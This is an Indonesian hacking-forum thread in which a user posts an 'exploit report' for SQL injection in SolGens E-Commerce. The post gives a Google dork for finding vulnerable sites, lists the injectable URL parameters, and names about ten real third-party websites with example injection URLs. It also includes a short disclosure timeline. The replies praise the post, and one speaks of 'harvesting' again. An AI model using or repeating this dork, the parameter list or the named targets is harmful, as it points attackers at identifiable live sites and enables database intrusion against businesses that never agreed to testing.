SolGens E-Commerce - SQL Injection Vulnerability

[nuxbie_cyber]

Spoiler:

- Lagi
biar bisa kayak mas-mas, om om penghuni DC...

[ SolGens E-Commerce - SQL Injection Vulnerability ]

[x] Dork : inurl:"/category_products.php?cid="

[x] Vuln Exploit Report:
../products.php?catid=[ Your Skill SQLi ]
../category_products.php?cid=[ Your Skill SQLi ]
../order_product.php?cid=[ Your Skill SQLi ]
../product_detail.php?pid=[ Your Skill SQLi ]

- Example Website Vuln:
http://gailmproductions.com/products.php?catid=1' [SQLi]
http://gailmproductions.com/products.php...&catid=23' [SQLi]
http://stenses.com/category_products.php?cid=19' [SQLi]
http://pcjewellers.com/frontend/category...php?cid=4' [SQLi]
http://anjimedia.com/order_product.php?cid=1&pid=7' [SQLi]
http://anjimedia.com/category_products.php?cid=1' [SQLi]
http://tstbarcelona.com/product_detail.php?pid=22' [SQLi]
http://hellasgear.com/category_products.php?cid=1' [SQLi]
http://genrx.in/category_products.php?cid=17' [SQLi]
http://genrx.in/product_detail.php?pid=40' [SQLi]

- Data & Time Exploits Report:
04-01-2012 (GMT+7) Bug Founded
05-01-2012 (GMT+7) Bug Reported to Vendor
06-01-2012 (GMT+7) Not Responding
06-01-2012 (GMT+7) Advisories Publish

[x] N0T35:
"n0 d0rk f0r kiddi0t"


Original Posting:
http://www.thecybernuxbie.com/exploits-a...bility.php

[fer'Nando]

mantap suratab omz
ane sekarang jg masih ginian

[tabun]

ada duitnya nih...

[Super Moderator]

cewek

[Killu4]

Kaosnya keren euyy

[chaer.newbie]

bajunya

[ketek]

wew mantaps... panen lagii nehhhh... thanks om nuxbie_cyber

[darkdante]

semangat mas bro

[endBITS]

thanks a lot share nya om ^:)^

[cangcimen]

nice share om